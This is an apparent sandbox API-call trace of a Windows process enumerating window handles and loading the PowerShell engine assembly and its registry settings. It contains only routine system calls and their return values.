	[0297.162] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.162] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.162] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xc74
	[0297.162] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xc1c
	[0297.162] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xc08
	[0297.163] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xabc
	[0297.163] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x24c
	[0297.163] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xbb0
	[0297.163] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xbfc
	[0297.163] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xb10
	[0297.163] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x374
	[0297.163] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x368
	[0297.163] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xb28
	[0297.164] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xae8
	[0297.164] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xb14
	[0297.164] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x95c
	[0297.164] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xa8c
	[0297.164] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x46c
	[0297.164] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xb3c
	[0297.164] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xa90
	[0297.164] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xad0
	[0297.164] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xa9c
	[0297.165] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xaa0
	[0297.165] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xb1c
	[0297.165] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x7e0
	[0297.165] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xa74
	[0297.165] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x694
	[0297.165] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xa28
	[0297.165] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x9b0
	[0297.165] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x8d8
	[0297.166] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x940
	[0297.166] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x93c
	[0297.166] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4ec
	[0297.166] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x150
	[0297.166] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x720
	[0297.166] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x3c4
	[0297.166] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x7d4
	[0297.166] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x6c8
	[0297.166] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xb54
	[0297.166] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xb54
	[0297.167] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xb5c
	[0297.167] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x838
	[0297.167] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x818
	[0297.167] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x5b8
	[0297.167] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x494
	[0297.167] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x1ec
	[0297.167] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x440
	[0297.167] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x7e8
	[0299.649] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x730
	[0300.305] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x2c8
	[0301.038] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x31c
	[0301.302] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x330
	[0301.303] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x128
	[0302.628] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x5c8
	[0302.738] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x6f8
	[0302.739] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x358
	[0303.424] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x73c
	[0303.424] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xb0
	[0303.424] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x250
	[0303.424] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x240
	[0303.424] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x790
	[0303.424] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x61c
	[0303.424] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x568
	[0303.424] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x538
	[0303.424] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x540
	[0303.424] GetWindowThreadProcessId (in: hWnd=0x700a4, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x510
	[0303.424] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x460
	[0303.425] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x79c
	[0303.425] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4e0
	[0303.425] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x460
	[0303.425] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x778
	[0303.428] WerSetFlags () returned 0x0
	[0303.434] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0303.434] CoTaskMemFree (pv=0x0) 
	[0303.435] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14dde8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14dde0 | out: pulNumLanguages=0x14dde8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14dde0) returned 1
	[0303.435] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14dde8, pwszLanguagesBuffer=0x2c5a420, pcchLanguagesBuffer=0x14dde0 | out: pulNumLanguages=0x14dde8, pwszLanguagesBuffer=0x2c5a420, pcchLanguagesBuffer=0x14dde0) returned 1
	[0303.439] CoTaskMemAlloc (cb=0x24) returned 0x291420
	[0303.439] GetUserDefaultLocaleName (in: lpLocaleName=0x291420, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0303.439] CoTaskMemFree (pv=0x291420) 
	[0303.458] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0303.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.459] CoTaskMemFree (pv=0x1f7900) 
	[0303.460] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0303.460] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.460] CoTaskMemFree (pv=0x1f7900) 
	[0303.462] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0303.462] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.462] CoTaskMemFree (pv=0x1f7900) 
	[0304.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.521] SetErrorMode (uMode=0x1) returned 0x1
	[0304.522] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14da60 | out: lpFileInformation=0x14da60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0304.522] SetErrorMode (uMode=0x1) returned 0x1
	[0304.522] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14dcd0 | out: lpdwHandle=0x14dcd0) returned 0x94c
	[0304.523] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c5dcb0 | out: lpData=0x2c5dcb0) returned 1
	[0304.525] VerQueryValueW (in: pBlock=0x2c5dcb0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14dc48, puLen=0x14dc40 | out: lplpBuffer=0x14dc48*=0x2c5dd4c, puLen=0x14dc40) returned 1
	[0304.526] VerQueryValueW (in: pBlock=0x2c5dcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14dbb8, puLen=0x14dbb0 | out: lplpBuffer=0x14dbb8*=0x2c5de28, puLen=0x14dbb0) returned 1
	[0304.526] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0304.526] CoTaskMemAlloc (cb=0x2e) returned 0x243b00
	[0304.526] lstrcpyW (in: lpString1=0x243b00, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0304.526] CoTaskMemFree (pv=0x243b00) 
	[0304.526] VerQueryValueW (in: pBlock=0x2c5dcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14dbb8, puLen=0x14dbb0 | out: lplpBuffer=0x14dbb8*=0x2c5de7c, puLen=0x14dbb0) returned 1
	[0304.526] lstrlenW (lpString="System.Management.Automation") returned 28
	[0304.526] CoTaskMemAlloc (cb=0x3c) returned 0x29b180
	[0304.526] lstrcpyW (in: lpString1=0x29b180, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0304.526] CoTaskMemFree (pv=0x29b180) 
	[0304.526] VerQueryValueW (in: pBlock=0x2c5dcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14dbb8, puLen=0x14dbb0 | out: lplpBuffer=0x14dbb8*=0x2c5ded8, puLen=0x14dbb0) returned 1
	[0304.526] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0304.526] CoTaskMemAlloc (cb=0x20) returned 0x234ac0
	[0304.526] lstrcpyW (in: lpString1=0x234ac0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0304.526] CoTaskMemFree (pv=0x234ac0) 
	[0304.526] VerQueryValueW (in: pBlock=0x2c5dcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14dbb8, puLen=0x14dbb0 | out: lplpBuffer=0x14dbb8*=0x2c5df18, puLen=0x14dbb0) returned 1
	[0304.526] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0304.526] CoTaskMemAlloc (cb=0x44) returned 0x29b180
	[0304.526] lstrcpyW (in: lpString1=0x29b180, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0304.526] CoTaskMemFree (pv=0x29b180) 
	[0304.526] VerQueryValueW (in: pBlock=0x2c5dcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14dbb8, puLen=0x14dbb0 | out: lplpBuffer=0x14dbb8*=0x2c5df80, puLen=0x14dbb0) returned 1
	[0304.526] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0304.526] CoTaskMemAlloc (cb=0x76) returned 0x2498c0
	[0304.526] lstrcpyW (in: lpString1=0x2498c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0304.526] CoTaskMemFree (pv=0x2498c0) 
	[0304.526] VerQueryValueW (in: pBlock=0x2c5dcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14dbb8, puLen=0x14dbb0 | out: lplpBuffer=0x14dbb8*=0x2c5e01c, puLen=0x14dbb0) returned 1
	[0304.526] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0304.526] CoTaskMemAlloc (cb=0x44) returned 0x29b180
	[0304.526] lstrcpyW (in: lpString1=0x29b180, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0304.527] CoTaskMemFree (pv=0x29b180) 
	[0304.527] VerQueryValueW (in: pBlock=0x2c5dcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14dbb8, puLen=0x14dbb0 | out: lplpBuffer=0x14dbb8*=0x2c5e080, puLen=0x14dbb0) returned 1
	[0304.527] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0304.527] CoTaskMemAlloc (cb=0x58) returned 0x227460
	[0304.527] lstrcpyW (in: lpString1=0x227460, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0304.527] CoTaskMemFree (pv=0x227460) 
	[0304.527] VerQueryValueW (in: pBlock=0x2c5dcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14dbb8, puLen=0x14dbb0 | out: lplpBuffer=0x14dbb8*=0x2c5e0fc, puLen=0x14dbb0) returned 1
	[0304.527] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0304.527] CoTaskMemAlloc (cb=0x20) returned 0x234ac0
	[0304.527] lstrcpyW (in: lpString1=0x234ac0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0304.527] CoTaskMemFree (pv=0x234ac0) 
	[0304.527] VerQueryValueW (in: pBlock=0x2c5dcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14dbb8, puLen=0x14dbb0 | out: lplpBuffer=0x14dbb8*=0x2c5dda4, puLen=0x14dbb0) returned 1
	[0304.527] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0304.527] CoTaskMemAlloc (cb=0x66) returned 0x2901d0
	[0304.527] lstrcpyW (in: lpString1=0x2901d0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0304.527] CoTaskMemFree (pv=0x2901d0) 
	[0304.527] VerQueryValueW (in: pBlock=0x2c5dcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14dbb8, puLen=0x14dbb0 | out: lplpBuffer=0x14dbb8*=0x0, puLen=0x14dbb0) returned 0
	[0304.527] VerQueryValueW (in: pBlock=0x2c5dcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14dbb8, puLen=0x14dbb0 | out: lplpBuffer=0x14dbb8*=0x0, puLen=0x14dbb0) returned 0
	[0304.527] VerQueryValueW (in: pBlock=0x2c5dcb0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14dbb8, puLen=0x14dbb0 | out: lplpBuffer=0x14dbb8*=0x0, puLen=0x14dbb0) returned 0
	[0304.527] VerQueryValueW (in: pBlock=0x2c5dcb0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14db88, puLen=0x14db80 | out: lplpBuffer=0x14db88*=0x2c5dd4c, puLen=0x14db80) returned 1
	[0304.527] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0304.527] VerLanguageNameW (in: wLang=0x0, szLang=0x245a70, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0304.527] CoTaskMemFree (pv=0x245a70) 
	[0304.527] VerQueryValueW (in: pBlock=0x2c5dcb0, lpSubBlock="\\", lplpBuffer=0x14dbd8, puLen=0x14dbd0 | out: lplpBuffer=0x14dbd8*=0x2c5dcd8, puLen=0x14dbd0) returned 1
	[0304.537] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0304.537] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.537] CoTaskMemFree (pv=0x1f7900) 
	[0304.542] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0304.542] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.542] CoTaskMemFree (pv=0x1f7900) 
	[0304.547] lstrlenW (lpString="䅁") returned 1
	[0304.557] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14daa8 | out: phkResult=0x14daa8*=0x1c8) returned 0x0
	[0304.558] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x14da98 | out: phkResult=0x14da98*=0x1d0) returned 0x0
	[0304.558] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14db28 | out: phkResult=0x14db28*=0x1cc) returned 0x0
	[0304.561] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14da6c, lpData=0x0, lpcbData=0x14da68*=0x0 | out: lpType=0x14da6c*=0x1, lpData=0x0, lpcbData=0x14da68*=0x56) returned 0x0
	[0305.601] CoTaskMemAlloc (cb=0x5a) returned 0x290160
	[0305.601] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14da3c, lpData=0x290160, lpcbData=0x14da38*=0x56 | out: lpType=0x14da3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14da38*=0x56) returned 0x0
	[0305.601] CoTaskMemFree (pv=0x290160) 
	[0305.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.629] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0305.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.629] CoTaskMemFree (pv=0x1f7900) 
	[0308.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0308.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0310.025] CoTaskMemAlloc (cb=0x104) returned 0x1f7a10
	[0310.026] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.026] CoTaskMemFree (pv=0x1f7a10) 
	[0310.026] CoTaskMemAlloc (cb=0x104) returned 0x1f7a10
	[0310.026] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.026] CoTaskMemFree (pv=0x1f7a10) 
	[0310.053] CoTaskMemAlloc (cb=0x104) returned 0x1f7a10
	[0310.053] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.053] CoTaskMemFree (pv=0x1f7a10) 
	[0310.054] CoTaskMemAlloc (cb=0x104) returned 0x1f7a10
	[0310.054] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.054] CoTaskMemFree (pv=0x1f7a10) 
	[0310.054] CoTaskMemAlloc (cb=0x104) returned 0x1f7a10
	[0310.055] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.055] CoTaskMemFree (pv=0x1f7a10) 
	[0311.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0311.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0311.793] CoTaskMemAlloc (cb=0x104) returned 0x1f7a10
